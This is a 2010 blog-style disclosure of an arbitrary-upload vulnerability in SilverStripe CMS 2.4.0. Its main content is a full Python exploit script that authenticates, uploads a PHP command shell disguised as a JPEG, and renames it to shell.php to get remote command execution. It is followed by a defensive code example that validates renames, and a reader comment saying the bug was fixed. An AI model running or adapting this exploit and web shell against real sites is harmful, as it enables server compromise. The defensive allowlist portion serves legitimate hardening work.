
Monday, June 7, 2010

SilverStripe CMS 2.4.0 Arbitrary Upload

An arbitrary upload vulnerability in SilverStripe CMS 2.4.0 can be exploited to upload a PHP shell. A user account with File & Images permission is necessary to exploit this vulnerability.

PoC
Silverstripe-Shell.py
# Python 2 PoC: log in, upload the payload under an image name, then rename it to .php
import sys, socket, re
host = '192.168.1.4'
path = '/silverstripe'
username = 'admin'
password = 'Password1'
port = 80

def send_request(request):
    # Raw HTTP/1.1 exchange over a plain socket; returns the full response text
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    s.send(request)

    resp = ''

    while 1:
        r = s.recv(8192)
        if not r: break
        resp += r
        if r[:15] == 'HTTP/1.1 302 OK': break

    s.close()

    return resp

def upload_shell():
    print 'authenticating'

    # Step 1: log in through the standard MemberAuthenticator form
    content = 'AuthenticationMethod=MemberAuthenticator&Email=' + username + '&Password='+ password + '&action_dologin=Log+in'

    header = 'POST http://' + host + path + '/Security/LoginForm HTTP/1.1\r\n'\
             'Host: ' + host + '\r\n'\
             'Connection: keep-alive\r\n'\
             'User-Agent: x\r\n'\
             'Content-Length: ' + str(len(content)) + '\r\n'\
             'Cache-Control: max-age=0\r\n'\
             'Origin: http://' + host + '\r\n'\
             'Content-Type: application/x-www-form-urlencoded\r\n'\
             'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\
             'Accept-Encoding: gzip,deflate,sdch\r\n'\
             'Accept-Language: en-US,en;q=0.8\r\n'\
             'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
             '\r\n'

    resp = send_request(header + content)

    print 'uploading shell'

    # Keep the PHPSESSID cookie from the login response for the later requests
    match = re.findall(u'Set-Cookie:\s([^\r\n]+)', resp)

    for m in match:
        if m[:9] == 'PHPSESSID':
            cookie = m

    # Step 2: upload the payload with a .jpg name and an image/jpeg content type
    content = '------x\r\n'\
              'Content-Disposition: form-data; name="ID"\r\n'\
              '\r\n'\
              '0\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="FolderID"\r\n'\
              '\r\n'\
              '0\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="action_doUpload"\r\n'\
              '\r\n'\
              '1\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="Files[1]"; filename=""\r\n'\
              '\r\n'\
              '\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="Files[0]"; filename="shell.jpg"\r\n'\
              'Content-Type: image/jpeg\r\n'\
              '\r\n'\
              '<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n'\
              '\r\n'\
              '\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="action_upload"\r\n'\
              '\r\n'\
              'Upload Files Listed Below\r\n'\
              '------x--\r\n'

    header = 'POST http://' + host + path + '/admin/assets/UploadForm HTTP/1.1\r\n'\
             'Host: ' + host + '\r\n'\
             'Proxy-Connection: keep-alive\r\n'\
             'User-Agent: x\r\n'\
             'Content-Length: ' + str(len(content)) + '\r\n'\
             'Cache-Control: max-age=0\r\n'\
             'Origin: http://' + host + '\r\n'\
             'Content-Type: multipart/form-data; boundary=----x\r\n'\
             'Accept: text/html\r\n'\
             'Accept-Encoding: gzip,deflate,sdch\r\n'\
             'Accept-Language: en-US,en;q=0.8\r\n'\
             'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
             'Cookie: ' + cookie + '\r\n'\
             '\r\n'

    resp = send_request(header + content)

    print 'grabbing ids'

    # Step 3: read the new file's ID and name back out of the upload response
    file_id = re.search(u'/\*\sIDs:\s(\d+)\s\*/', resp).group(1)
    file_name = re.search(u'/\*\sNames:\s([^\*]+)\s\*/', resp).group(1)

    resp = send_request('GET http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1 HTTP/1.1\r\n'\
                        'Host: ' + host + '\r\n'\
                        'Cookie: ' + cookie + '\r\n\r\n')

    print 'renaming shell'

    # Step 4: rename the stored file to shell.php through the asset edit form
    security_id = re.search(u'name="SecurityID" value="(\d+)"', resp).group(1)
    owner_id = re.search(u'option selected="selected" value="(\d+)"', resp).group(1)

    content = 'Title=' + file_name + '&Name=shell.php&FileType=JPEG+image+-+good+for+photos&Size=56+bytes&OwnerID=' + owner_id + '&Dimensions=x&ctf%5BchildID%5D=' + file_id + '&ctf%5BClassName%5D=File&SecurityID=' + security_id + '&action_saveComplexTableField=Save'

    header = 'POST http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/DetailForm HTTP/1.1\r\n'\
             'Host: ' + host + '\r\n'\
             'Proxy-Connection: keep-alive\r\n'\
             'User-Agent: x\r\n'\
             'Referer: http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1\r\n'\
             'Content-Length: ' + str(len(content)) + '\r\n'\
             'Cache-Control: max-age=0\r\n'\
             'Origin: http://' + host + '\r\n'\
             'Content-Type: application/x-www-form-urlencoded\r\n'\
             'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\
             'Accept-Encoding: gzip,deflate,sdch\r\n'\
             'Accept-Language: en-US,en;q=0.8\r\n'\
             'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
             'Cookie: ' + cookie + '; PastMember=1\r\n'\
             '\r\n'

    resp = send_request(header + content)

    print 'shell located at http://' + host + path + '/assets/shell.php'

upload_shell()
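The PoC above uploads its payload under a .jpg name and then renames it to shell.php through the edit form, so an extension check that runs only at upload time is bypassed. As an added example (not SilverStripe's code or the fix from the ticket), here is a minimal asset store in which the same allowlist check guards the rename path as well as the upload path, with the weak upload-only behaviour selectable for comparison. `AssetStore`, `is_safe_asset_name` and `rename_outcome` are hypothetical names, and the extension sets are constructed for the example.

```python
import os
import re

# Final extensions the asset area may hold; everything else is refused.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
# Refused in any segment of the name ("x.php.jpg" too): some server configs execute them.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi"}
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)+$")

def is_safe_asset_name(name):
    # Bare name, allowlisted final extension, no executable segment anywhere.
    if os.path.basename(name) != name or not _SAFE_NAME.match(name):
        return False
    parts = name.lower().split(".")
    if any(p in EXECUTABLE_EXTENSIONS for p in parts[1:]):
        return False
    return parts[-1] in ALLOWED_EXTENSIONS

class AssetStore:
    # Hypothetical stand-in for a CMS asset area, not SilverStripe's code.
    # validate_rename=False reproduces the weak pattern: the name is checked
    # on upload only, so an edit/rename form can turn an image into a script.
    def __init__(self, validate_rename):
        self.validate_rename = validate_rename
        self.files = {}  # id -> current file name
        self._next_id = 1

    def upload(self, name):
        if not is_safe_asset_name(name):
            raise ValueError("upload rejected: " + name)
        file_id, self._next_id = self._next_id, self._next_id + 1
        self.files[file_id] = name
        return file_id

    def rename(self, file_id, new_name):
        # Hardened variant: the same gate guards every path that can change a stored name.
        if self.validate_rename and not is_safe_asset_name(new_name):
            raise ValueError("rename rejected: " + new_name)
        self.files[file_id] = new_name
        return new_name

def rename_outcome(validate_rename):
    # Upload 'shell.jpg', attempt the PoC's rename to 'shell.php', return the stored name.
    store = AssetStore(validate_rename)
    file_id = store.upload("shell.jpg")
    try:
        return store.rename(file_id, "shell.php")
    except ValueError:
        return store.files[file_id]
```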

30 comments:

  1. Thanks for noting this; the vulnerability was fixed a while ago in http://open.silverstripe.org/ticket/5693
